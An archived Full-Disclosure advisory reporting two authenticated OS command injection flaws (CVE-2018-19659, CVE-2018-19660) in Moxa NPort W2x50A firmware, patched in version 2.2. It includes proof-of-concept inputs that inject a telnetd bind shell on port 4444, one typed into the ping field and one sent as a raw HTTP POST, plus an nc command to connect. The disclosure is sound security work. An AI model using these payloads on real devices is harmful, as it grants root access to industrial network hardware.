| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <1543478242.296451890@f88.i.mail.ru>
Date: Thu, 29 Nov 2018 10:57:22 +0300
From: Maxim Khazov via Fulldisclosure
<fulldisclosure@...lists.org>
To: fulldisclosure@...lists.org
Subject: [FD] Multiple OS Command Injection in Moxa NPort W2x50A products
Moxa NPort W2x50A products with firmware version 2.1 Build_17112017 or lower are vulnerable to several authenticated OS Command Injection vulnerabilities:
#1 Authenticated OS Command Injection in web server ping functionality
Reserverd CVE ID: CVE-2018-19659
A specially crafted HTTP POST request to /goform/net_WebPingGetValue can result in running OS commands as the root user. Exploitation required authentication. This is similar to CVE-2017-12120.
Proof-of-concept:
1. Authenticate to Moxa NPort W2x50A device.
2. Go to Main menu → System Management → Maintenance → Ping → Destination
3. Enter ;telnetd -l/bin/sh -p4444&;. in 'Destination' field
4. Connect to opened bind shell: nc $IP_ADDRESS 4444
#2 Authenticated OS Command Injection in web server wlan profile properties functionality
Reserverd CVE ID: CVE-2018-19660
A specially crafted HTTP POST request to /goform/net_WebSettingProfileSecurity can result in running OS commands as the root user. Exploitation required authentication.
Proof-of-concept (sample HTTP request opening bind shell on port 4444):
POST /goform/webSettingProfileSecurity?profileID=1 HTTP/1.1
Host: {IP:PORT}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SessionID={YOURSESSIONID}
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 309
Authentication=3&EAP_method=1&Username= ;telnetd -l/bin/sh -p4444&;
These vulnerabilities were fixed in the firmware version 2.2 Build_18082311.
https://www.moxa.com/support/download.aspx?type=support&id=14781
Best regards,
Maksim Khazov
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists